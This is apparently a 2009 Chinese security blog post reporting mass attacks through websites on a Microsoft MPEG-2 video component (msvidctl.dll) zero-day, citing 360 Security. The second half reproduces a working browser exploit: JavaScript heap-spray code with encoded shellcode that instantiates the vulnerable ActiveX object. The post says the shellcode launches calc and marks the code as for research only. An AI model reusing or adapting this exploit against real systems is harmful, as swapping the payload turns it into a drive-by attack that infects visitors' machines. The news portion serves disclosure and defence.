微软曝出MPEG-2视频0day漏洞

    [雷阵雨 July 6, 2009 09:38 | by !4p47hy ]
来自:CB

360安全中心紧急发布红色安全预警称,一起针对微软MPEG-2视频解析模块0day漏洞的大.规模网络攻击已经爆发。截至5日中午12点,红星美凯龙官方网站、中视音像、中国电子科技集团公司第二研究所、齐鲁石化医院集团、中国皮具网、中国煤炭网、北京啄木鸟婚纱摄影集团、天津市第一中心医院、云南地产门户网、铁道兵网等967个网站的7740个网址已被黑客植入了相应的攻击代码,其中包括了大量的色情网站,360安全中心已经为用户拦截了超过150663次高危访问行为,而这个数字仍在高速增长。

据360安全专家石晓虹博士介绍,从7月4日中午12点以后,360安全中心云计算体系监控到一种相同类型的网络攻击开始大量增加,到7月5日凌晨7点突然呈爆发态势。经360专家验证,黑客利用了微软Windows操作系统BDATuningModelMPEG2TuneRequest视频组件的一个0Day漏洞。

当用户点击相应“挂马网页”时,恶意代码就会自动触发以上MPEG2视频组件的msvidctl.dll模块,相应地IE等浏览器会表现为卡死一小会儿,随后,电脑就会自动下载和运行一系列黑客预先设置好的木马程序,期间会出现恶意代码会强制关闭有大部分安全软件、劫持IE首页、弹出广告页面等各种现象。

据石晓虹博士介绍,该漏洞与今年5月下旬360安全中心率先发现的微软“DirectShow视频开发包”0day漏洞相似,都是通过浏览器来触发的漏洞。但不同的是,这个MPEG-20Day漏洞要容易利用得多,而且黑客不再需要网民运行任何恶意视频文件就能使其电脑变为任由黑客摆布的“肉鸡”。这种攻击方式更为隐蔽,普通用户更难防范,因而会更容易受到木马产业链等不法分子的青睐。另外,从目前测试的结果来看,由于VISTA、Windows2008以及WIN7使用了SAFESEH/GSCOOKIE技术,该0Day漏洞主要影响的是用户量最大的WindowsXP系统。

Highslide JS


红星美凯龙官网被植入针对微软mpeg20Day漏洞的攻击代码

Highslide JS


铁道兵网被植入针对微软mpeg20Day漏洞的攻击代码

附EXP:(来自:鬼仔 Blog)

Microsoft DirectShow存在可被远程利用的堆栈溢出漏洞。

关键代码如下:
-------------------------以下内容有危险,仅为研究使用--------------
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
"%u6363%u5251%u634c%u5553%u4550");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

该shellcode会执行calc。
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(9939)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive